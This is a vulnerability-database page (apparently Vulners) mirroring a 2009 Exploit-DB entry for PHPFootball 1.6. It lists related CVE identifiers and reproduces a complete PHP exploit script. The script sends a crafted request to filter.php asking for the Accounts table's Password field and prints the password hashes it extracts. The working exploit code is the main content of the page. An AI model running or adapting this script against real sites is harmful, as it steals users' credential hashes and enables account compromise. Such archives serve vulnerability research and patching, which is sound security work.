Lucene search
+L

PHPFootball 1.6 - Remote Hash Disclosure

🗓️ 01 Jan 2009 00:00:00Reported by KinG-LioNType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 42 Views

Remote Hash Disclosure in PHPFootball 1.

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2009-0709
1 Jan 200900:00
circl
circl
Circl
CVE-2009-0710
1 Jan 200900:00
circl
circl
Circl
CVE-2009-0711
1 Jan 200900:00
circl
cve
CVE
CVE-2009-0709
23 Feb 200915:00
cve
cve
CVE
CVE-2009-0710
23 Feb 200915:00
cve
cve
CVE
CVE-2009-0711
23 Feb 200915:00
cve
cvelist
Cvelist
CVE-2009-0709
23 Feb 200915:00
cvelist
cvelist
Cvelist
CVE-2009-0710
23 Feb 200915:00
cvelist
cvelist
Cvelist
CVE-2009-0711
23 Feb 200915:00
cvelist
euvd
EUVD
EUVD-2009-0709
7 Oct 202500:30
euvd
Rows per page
<?php

// http://garr.dl.sourceforge.net/sourceforge/phpfootball/PHPfootball1.6.zip

$host = $argv[1];
$path = $argv[2];

if ($argc != 3) {

    echo "PHPFootball <= 1.6 (filter.php) Remote Hash Disclosure Exploit\n";
    echo "by KinG-LioN - http://eurohackers.it\n";
    echo "Usage: php {$argv[0]} <host> <path>\n";
    exit;
}
else {

   $head .= "GET /{$path}/filter.php?dbtable=Accounts&dbfield=Password HTTP/1.1\r\n";
   $head .= "Host: {$host}\r\n";
   $head .= "Connection: close\r\n\r\n";

   $fsock = fsockopen ($host,80);
   fputs ($fsock,$head);

   while (!feof($fsock)) {
     $cont .= fgets($fsock);
   }
    fclose($fsock);

    if (preg_match_all("/<td class=td>(.+?)<\/td>/",$cont,$i)) {
        print_r($i[1]);
   }
   else {
       die ("exploit error\n");
   }
}


?>

# milw0rm.com [2009-01-01]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

21 Dec 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.01507
42